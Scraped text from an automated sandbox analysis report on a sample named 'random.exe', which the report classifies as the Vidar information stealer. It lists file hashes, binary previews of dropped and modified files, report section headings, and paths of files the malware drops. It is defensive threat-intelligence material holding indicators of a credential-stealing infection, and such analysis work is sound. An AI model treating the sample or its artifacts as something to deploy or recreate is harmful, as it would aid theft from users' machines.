SSDEEP:	24:p/o2e8GFp8PvMu0Vnu7vFPvJ8+FXg0Mej39ImlQu/kKcCEF4wflBX0FCUK:22e8+8PvMu0VnuRPvJ8+FXgMtImlx3cd
MD5:	E68A33BDAF7AEBE6D5BBBCEFDED6AC5C
SHA1:	A1120341BB4452FCA47EB5EA8FA62A08BFC48073
SHA-256:	A5DC5B9F31D69E6F65F405EF4E187BAB262746AAAC08E95C195AA77A0B310DE1
SHA-512:	69E1A60C0FFE8AA19B55FABE47801EEEA7CF4C84E426318D8B7BFFAF09A14FC5F569573BE30753D354B604911A616C231F485B08C3778E0A214F7E3DC9C21D2C
Malicious:	false
Preview:	.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="artbaker".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:05:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:41:02.9208750-08:00".. manifestVersion="1.0".. owners="artbaker".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-Cryptography-CryptoConfig-DL".. processorArchitecture="*".. publicKeyToken="".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration xmlns="">.. <machineSpecific>.. <migXml>.. Check as this is only valid for down-level OS < than Windows Vista ? -->.. <detects>..

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44735
Entropy (8bit):	6.095978027520341
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4xszLmZvO7VuouRf33VeKwWE7RTupzKscDX//NPC1os:z/Ps+wsI7yOyRzKoRTuiVIos
MD5:	DE2586EAECCDCB6784F1F7A6823AF84F
SHA1:	1FCE5DB01AC128B0C81DAF822926B53E5C558E8A
SHA-256:	E67F6FB956694AEAD694A128E14769CE58A6DC1A99ABFB8ED6278D2F4E1D3EBC
SHA-512:	ACCE33D689215ADEC9AE99E1225670E55CC6D13FDD4BB62BD24964DD903F9B23EDD4CEA0E25BB88E363A220143FCD26112179EEAFBA21E80E57FAFF0E84C5A53
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	59407
Entropy (8bit):	6.75034905429035
Encrypted:	false
SSDEEP:	768:+Ur2+9BGmd9OTGQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:v2+9BGmdATGODv7xvTphAiPChgZ2kOE6
MD5:	0BD1586903BACA9D97C9D6DCA8C8C254
SHA1:	A6D50245B0D6B27C1AB432587B0AE894AEAD1E0D
SHA-256:	54862593DE36D2C535DA78A7FEAA625AD65C1B9A20B6748C8783CA86D84A1600
SHA-512:	05EA18CA5A7C867C5B576C14997FAB73CC2CDCAFE669924F8E65A01454B8CB4CF34A35EC09A7C11A61611096BCF8859217F64654BB77FB6BD2F1919ED489ABDC
Malicious:	false
Preview:	....gE..x<.....G.5....m.."...p...=.-...."..=.0..'....;1??o.\|.^U=""....hpUb..q...?/".+..DGG..=.....333.@ .n..QU.......L.CU./...S.Ri1.N{;.G...l6k.~U}.0.O....@.{~.c.@.........Pn.A...41jS.?..?""...@....-.T..o...E.o.om.<.G..x.A.0F..T.q`.j..{:.`.jD.....\|..s.D.......m..B.GU.....q.....4.E.I.<....("....a.....{XZZ. "]"2.<U#.c......'.W..T...N..d2.Y........T.Zl.GT.C"..^+.bFU_.......\|>.r8......4.r..a......3.m?-"O.1 X....{P...k...~.0.o....)..x<.E.=..2...,....#...i.]....n.l.Tu.....U..i.....9o.x..-....f....Q.$....T..:.:..e`......T'.^.m.V*.Z.V.G......1...F..@.........$..XQ.%....F..I....J.zGGG.{...x......".f.f..0U.........G.........n...N.{LD.1U...a..+.e...j{{{.{...x.?.AZZZ\|.e.T5@....DTu@D..v -"q .$j.C.[.w.j .v.....SnTU.j;y.XP.\m7_T.q...,......L.,mllT:::..\.........u......IEND.B`........(...0...`..... ....................................................................................................V.......................................V.................

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report random.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\g4opz\00hl68

C:\ProgramData\g4opz\00z58g

C:\ProgramData\g4opz\2dtjmy58g

C:\ProgramData\g4opz\2vkxl68gd

C:\ProgramData\g4opz\3790hv

C:\ProgramData\g4opz\47y5pz

C:\ProgramData\g4opz\4e3w4e

C:\ProgramData\g4opz\4w4ekn

Windows Analysis Report
random.exe